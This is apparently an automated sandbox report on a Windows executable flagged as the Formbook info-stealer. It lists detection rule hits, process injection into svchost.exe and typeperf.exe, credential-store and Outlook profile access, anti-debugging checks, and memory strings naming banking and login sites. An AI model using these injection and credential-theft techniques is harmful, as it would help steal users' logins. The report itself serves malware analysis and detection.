            Source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/9
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeFile created: C:\Users\user~1\AppData\Local\Temp\camellinJump to behavior
            Source: sa7Bw41TUq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: typeperf.exe, 0000000C.00000002.3730128385.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3730128385.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1874628984.0000000000A19000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1874720843.0000000000A06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: sa7Bw41TUq.exeReversingLabs: Detection: 60%
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeFile read: C:\Users\user\Desktop\sa7Bw41TUq.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\sa7Bw41TUq.exe "C:\Users\user\Desktop\sa7Bw41TUq.exe"
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\sa7Bw41TUq.exe"
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeProcess created: C:\Windows\SysWOW64\typeperf.exe "C:\Windows\SysWOW64\typeperf.exe"
            Source: C:\Windows\SysWOW64\typeperf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\sa7Bw41TUq.exe"Jump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeProcess created: C:\Windows\SysWOW64\typeperf.exe "C:\Windows\SysWOW64\typeperf.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: pdh.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\typeperf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: sa7Bw41TUq.exeStatic file information: File size 1364575 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uxEGEjhWYrJv.exe, 0000000B.00000000.1558723774.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737429493.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: typeperf.pdb source: svchost.exe, 00000009.00000003.1628080025.0000000003624000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1627986392.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1628064356.000000000361A000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000B.00000002.3733446394.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1670896674.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1543886073.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1542199725.0000000003800000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1670422050.0000000002DA5000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1683622628.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1670896674.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1543886073.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1542199725.0000000003800000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, typeperf.exe, 0000000C.00000003.1670422050.0000000002DA5000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1683622628.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: typeperf.exe, 0000000C.00000002.3739193871.000000000372C000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3730128385.0000000000981000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000000.1757312784.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1987185043.000000003867C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: typeperf.pdbGCTL source: svchost.exe, 00000009.00000003.1628080025.0000000003624000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1627986392.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1628064356.000000000361A000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000B.00000002.3733446394.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: typeperf.exe, 0000000C.00000002.3739193871.000000000372C000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3730128385.0000000000981000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000000.1757312784.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1987185043.000000003867C000.00000004.80000000.00040000.00000000.sdmp
            Source: sa7Bw41TUq.exeStatic PE information: real checksum: 0xa961f should be: 0x14ea0c
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00401540 push es; retf 9_2_004016BD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040CB10 push edi; retf 9_2_0040CB11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00415BF6 push ecx; iretd 9_2_00415C03
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004034D0 push eax; ret 9_2_004034D2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004144A0 push ebp; retf 9_2_004144A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00418D0E push 00000067h; iretd 9_2_00418D72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004145D6 pushad ; ret 9_2_004145D7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040160B push es; retf 9_2_004016BD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040CF38 push ss; retf 9_2_0040CF54
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C309AD push ecx; mov dword ptr [esp], ecx9_2_03C309B6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031309AD push ecx; mov dword ptr [esp], ecx12_2_031309B6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005D1139 push 074A8058h; ret 12_2_005D118C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005CC087 push es; retf 12_2_005CC08A
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005D115C push 074A8058h; ret 12_2_005D118C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005B963D push edi; retf 12_2_005B963E
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005D478B push ss; ret 12_2_005D478C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005CB780 push ecx; iretd 12_2_005CB783
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005D47AB push 0000000Eh; iretd 12_2_005D47AD
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005C583B push 00000067h; iretd 12_2_005C589F
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005CAC61 push DC60BA47h; iretd 12_2_005CAC6C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005C9C80 push eax; ret 12_2_005C9C81
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5B3CA pushfd ; retf 12_2_02E5B3C9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5B397 pushfd ; retf 12_2_02E5B3C9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5D311 push ebx; retf 12_2_02E5D312
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5D163 push ebp; ret 12_2_02E5D169
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5D10F push ebp; ret 12_2_02E5D169
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5B406 pushfd ; retf 12_2_02E5B3C9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5BA46 pushad ; iretd 12_2_02E5BA49
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E52DEB push ss; ret 12_2_02E52DF7
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DE6C25 push ecx; iretd 14_2_04DE6C28
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DE0D3F push 00000067h; iretd 14_2_04DE0D44
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeAPI/Special instruction interceptor: Address: 4008324
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5BBA0 rdtsc 9_2_03C5BBA0
            Source: C:\Windows\SysWOW64\typeperf.exeWindow / User API: threadDelayed 9819Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\typeperf.exeAPI coverage: 3.1 %
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7516Thread sleep count: 154 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7516Thread sleep time: -308000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7516Thread sleep count: 9819 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7516Thread sleep time: -19638000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe TID: 7560Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe TID: 7560Thread sleep time: -46500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe TID: 7560Thread sleep time: -42000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\typeperf.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005CC4D0 FindFirstFileW,FindNextFileW,FindClose,12_2_005CC4D0
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: f3663-3k.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: f3663-3k.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: f3663-3k.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: f3663-3k.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: f3663-3k.12.drBinary or memory string: discord.comVMware20,11696492231f
            Source: typeperf.exe, 0000000C.00000002.3730128385.0000000000981000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3733521567.0000000000A49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: f3663-3k.12.drBinary or memory string: global block list test formVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: f3663-3k.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: f3663-3k.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: f3663-3k.12.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: f3663-3k.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: f3663-3k.12.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: f3663-3k.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: f3663-3k.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: f3663-3k.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: f3663-3k.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: firefox.exe, 00000010.00000002.1992752490.000002A4F856C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLL
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5BBA0 rdtsc 9_2_03C5BBA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00417903 LdrLoadDll,9_2_00417903
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEC3CD mov eax, dword ptr fs:[00000030h]9_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]9_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]9_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]9_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]9_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]9_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]9_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C383C0 mov eax, dword ptr fs:[00000030h]9_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C383C0 mov eax, dword ptr fs:[00000030h]9_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C383C0 mov eax, dword ptr fs:[00000030h]9_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C383C0 mov eax, dword ptr fs:[00000030h]9_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEB3D0 mov ecx, dword ptr fs:[00000030h]9_2_03CEB3D0
